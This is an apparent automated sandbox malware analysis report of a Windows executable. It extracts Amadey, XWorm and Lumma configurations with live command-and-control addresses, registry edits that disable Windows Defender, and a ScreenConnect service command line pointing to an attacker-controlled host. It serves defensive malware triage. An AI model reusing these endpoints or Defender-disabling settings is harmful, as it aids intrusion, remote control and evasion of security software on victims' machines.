Analysis
-
max time kernel
146s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
17-11-2024 09:36
Static task
static1
Behavioral task
behavioral1
Sample
766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe
Resource
win7-20240903-en
General
-
Target
766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe
-
Size
3.1MB
-
MD5
74ba48529515c95320f4a86fc42fc668
-
SHA1
c33b2b0c5e43e5ac274206ae964cf85bb8718048
-
SHA256
766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa
-
SHA512
16f09889b08eb9a4c2176ccfb590e31007c0c49336ba7aef6d54f16c6133c36945b3281ff7a4ff0099a0cae1eae12be2846ab24dbe1f977000953eb2868e85f8
-
SSDEEP
98304:XmP6PUaaDfBgWBPTrdEdsgxYC2JyLce9ebFyZgk6TR:XcqZexyV6T
Malware Config
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
xworm
87.120.112.33:8398
-
Install_directory
%AppData%
-
install_file
XClient.exe
Extracted
lumma
https://processhol.sbs/api
https://p10tgrace.sbs/api
https://peepburry828.sbs/api
https://3xp3cts1aim.sbs/api
https://p3ar11fter.sbs/api
Signatures
-
Amadey family
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/memory/3168-315-0x0000000000E30000-0x00000000012B6000-memory.dmp family_xworm behavioral1/memory/3168-316-0x0000000000E30000-0x00000000012B6000-memory.dmp family_xworm -
Lumma family
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection 8d83f60acf.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 8d83f60acf.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 8d83f60acf.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 8d83f60acf.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 8d83f60acf.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 8d83f60acf.exe -
Xworm family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ae1f140dbd.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ee6c94c274.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8d83f60acf.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ document.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3388 powershell.exe 3568 powershell.exe 3692 powershell.exe 3780 powershell.exe -
Downloads MZ/PE file
-
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\ScreenConnect Client (e6cb77284cf765aa)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (e6cb77284cf765aa)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=kasin22.zapto.org&p=8041&s=2afab910-a215-431f-82ab-e05c395db9ee&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAA3p0QovQE8UCvauwThin0fgAAAAACAAAAAAAQZgAAAAEAACAAAAAPAztQQ8eEYHMTWPCOKFLSqdwoBcVLw5UoOLmnChDfpwAAAAAOgAAAAAIAACAAAAAIZSTIe5D7hVlZlzzya74ctcqbOw2GRfzN3lmo4ex%2bF6AEAAAC3olR7%2fiiPWhcIv5WyqP8ZB5YG%2fKVPlXkUPvNJN0RLutl9Nu6ktnGcIYRS8ErKrofdRSIfXHWW5inycXpdHysvBrfPC2nWFKHSFcPS4uHRBPYHeYnJJ828rAePu5XCcF3Kppw9MHBh8TX3MgjUOh1aFSvyTJ%2fE7WL%2fl3WMDZbdGI0%2bO63IXeU%2bQx%2f6HzL4la%2f1BByh3z%2fa4w2zZQZFXVwUVImfVD1HWNN6DSZvH3dPjVbx2jblIYAEYMBHu2RoVlIXS1TUblzX6gKdQQ0Jlulszv13hLZLCrcoijOuKegkVmgrDIym2QSPFfQiGr6R84p0yGZaiK2r0GWGbHHpBQlH%2b3zuiqQEQhxTfrW2tkn9KfJcyAjuc4007%2b9lDwL%2f86HuTAp%2f6dqFmYcQljRU1rZJECsC%2bsTLd9XsBr6RS%2bBrN39ozhGYRvUscLBR2vOtEDNtCZsNOdos4cO3zTQg4ZWK9zRmCPevRe36UcdpARPPL%2bnbQ1yMSvUc5Z2MnQ5%2b0xQ0%2bm7DeIaCTxMhQ2aX%2bfJNEGxUVC9TA0DbuJlowGoYdHLUPylSZ9DlQoawUu32cCOr%2fVvZzwEYO330J693b%2fxpCIeAuWjswQASTawIG8tiZoRW%2ff5AayvJvQ3k1jAYzCP80fsnu%2fDfLNneMH1lEqYOmD3151Pudj%2fn0ITaMgxJjL8fAO7Q2O8AYZN5is%2bE88tytbaJbDKLKveD1%2bp9UL6GzqujjQdNw6taga2p%2fgAJA9JM%2fm8vS1RuJ9jjcVcIRFn19dSryrlNWH8nTK3XyeJaUOXcvywOEP%2b35boRJKfpqsSM%2fW5cHkHwIzWG%2b4CaFFDBP0VliM%2fQxRYbs4KYndCVPMTgqdOAWRbdNgBONim0pKAEPi%2b2Z3MENGjpnradlxPSg64WaKDIbH4QEWwoA6nEoK3yf85Pv%2b9CNkIZqeKgdJwgz82BUJdCqnW5Q49b5yMbKA6%2fe7bb9YnEqkU8FVmygvGIoFih51HhBN2W9iNYZZdfJvZUOlIXi5LEZWkyK3DdMFfu6ndemvPUbqxZnrKVQDtUtEDzISPcZJoyUQlmGx%2bLPZlRj6Q4L%2bMvNWuc%2b%2bSiy1Ys5R%2by81PkI%2f%2foC8fM1L33hhuuQom94jvPK8hgw%2bE5bMoi3G9fAEi4PKXdVk5h9BzC6hIbkduhH9MMVVTD%2b8Zipg2wUB%2bYhcB%2fZb2vdAvK4vf7CLnNglsYZNKMlNDZPJt1sQf7bnoAg6uZnCk7TZEVzKQ5BQd%2f7gmRvK97Qo%2fNWvof4MqorElBVEU5DwjzTlix1dkpPm7d0YUZR1xgKbuntFimNXyHXjcnLbbAUspLVhz23CvRK%2f5loHCjf0L5mot6HZPcWF2N1ffgYe5mnlyqlWoQM%2fqkA4Cp5AUKeMTqZhWbVaTypNh4u5%2bxZ6ERWOQ8udmTI97mjUAWdcAGx5YQf9UPKyYK8Z9dqgVy8rxef7CvhAykY3F7JEUbihsNuo0lawXusVsp8u3fZSErCRqirVB2Oe0nvfZqMHwdloeowoGLm2Lr8x0Ds70lk4GmrTGPSTpWR6gF2Rcf%2bkNWyBhNLkL7l%2f6EJFMrVmfc0AAAACRXx8E2CoKKC%2bhrWrEcr%2fDDv%2fBeljo9BUJSy6dqwDc5pWoLi1fF8oQjQM3SFDAUO4Kw10x%2fK0nq8XryEM%2fxnww&c=Traffic%20Test&c=&c=&c=&c=&c=&c=&c=\"" ScreenConnect.ClientService.exe -
Checks BIOS information in registry 2 TTPs 12 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion document.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion document.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ae1f140dbd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ee6c94c274.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8d83f60acf.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8d83f60acf.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ae1f140dbd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ee6c94c274.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk document.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk document.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 10 IoCs
pid Process 748 skotes.exe 2120 ae1f140dbd.exe 2916 ee6c94c274.exe 912 0c3c2ef132.exe 2796 8d83f60acf.exe 3168 document.exe 3512 SupportClientSetup.exe 4060 ScreenConnect.ClientService.exe 3616 ScreenConnect.WindowsClient.exe 2624 ScreenConnect.WindowsClient.exe -
Identifies Wine through registry keys 2 TTPs 6 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine 766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine ae1f140dbd.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine ee6c94c274.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine 8d83f60acf.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine document.exe -
Loads dropped DLL 33 IoCs
pid Process 2520 766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe 748 skotes.exe 748 skotes.exe 748 skotes.exe 748 skotes.exe 748 skotes.exe 748 skotes.exe 748 skotes.exe 3976 MsiExec.exe 4028 rundll32.exe 4028 rundll32.exe 4028 rundll32.exe 4028 rundll32.exe 4028 rundll32.exe 4028 rundll32.exe 4028 rundll32.exe 4028 rundll32.exe 4028 rundll32.exe 3796 MsiExec.exe 2152 MsiExec.exe 4060 ScreenConnect.ClientService.exe 4060 ScreenConnect.ClientService.exe 4060 ScreenConnect.ClientService.exe 4060 ScreenConnect.ClientService.exe 4060 ScreenConnect.ClientService.exe 4060 ScreenConnect.ClientService.exe 4060 ScreenConnect.ClientService.exe 4060 ScreenConnect.ClientService.exe 4060 ScreenConnect.ClientService.exe 4060 ScreenConnect.ClientService.exe 4060 ScreenConnect.ClientService.exe 4060 ScreenConnect.ClientService.exe 4060 ScreenConnect.ClientService.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features 8d83f60acf.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 8d83f60acf.exe -
Adds Run key to start application 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\ae1f140dbd.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1006867001\\ae1f140dbd.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\ee6c94c274.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1006868001\\ee6c94c274.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\0c3c2ef132.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1006869001\\0c3c2ef132.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\8d83f60acf.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1006870001\\8d83f60acf.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe" document.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\B: msiexec.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0009000000018784-105.dat autoit_exe -
Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs
Suspicious Windows Authentication Registry Modification.
description ioc Process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800650036006300620037003700320038003400630066003700360035006100610029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 msiexec.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (e6cb77284cf765aa)\rukjagcc.tmp ScreenConnect.ClientService.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (e6cb77284cf765aa)\rukjagcc.newcfg ScreenConnect.ClientService.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
pid Process 2520 766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe 748 skotes.exe 2120 ae1f140dbd.exe 2916 ee6c94c274.exe 2796 8d83f60acf.exe 3168 document.exe -
Drops file in Program Files directory 19 IoCs
description ioc Process File created C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsBackstageShell.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsFileManager.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\system.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Windows.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\app.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsAuthenticationPackage.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsCredentialProvider.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\Client.en-US.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\Client.Override.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\Client.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsFileManager.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\Client.Override.en-US.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsBackstageShell.exe.config msiexec.exe -
Drops file in Windows directory 16 IoCs
description ioc Process File created C:\Windows\Installer\f7778fa.msi msiexec.exe File opened for modification C:\Windows\Installer\f7778f8.ipi msiexec.exe File created C:\Windows\Tasks\skotes.job 766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe File created C:\Windows\Installer\f7778f8.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI7B77.tmp msiexec.exe File created C:\Windows\Installer\wix{C65824D8-9903-AFB4-B430-141024FF968F}.SchedServiceConfig.rmi MsiExec.exe File created C:\Windows\Installer\{C65824D8-9903-AFB4-B430-141024FF968F}\DefaultIcon msiexec.exe File opened for modification C:\Windows\INF\setupapi.ev1 DrvInst.exe File opened for modification C:\Windows\Installer\MSI7EC4.tmp msiexec.exe File opened for modification C:\Windows\Installer\f7778f7.msi msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File created C:\Windows\Installer\f7778f7.msi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI7BA6.tmp msiexec.exe File opened for modification C:\Windows\Installer\{C65824D8-9903-AFB4-B430-141024FF968F}\DefaultIcon msiexec.exe File opened for modification C:\Windows\INF\setupapi.ev3 DrvInst.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 23 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ee6c94c274.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 766282cfd30bca193b9e0863f0a994fefb694eb65fd3762461c07c299a5722fa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language document.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SupportClientSetup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ScreenConnect.ClientService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ae1f140dbd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0c3c2ef132.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8d83f60acf.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ScreenConnect.WindowsClient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ScreenConnect.WindowsClient.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS ScreenConnect.WindowsClient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU ScreenConnect.WindowsClient.exe -
Kills process with taskkill 5 IoCs
pid Process 1584 taskkill.exe 1052 taskkill.exe 2280 taskkill.exe 1788 taskkill.exe 2392 taskkill.exe -
Modifies data under HKEY_USERS 52 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople 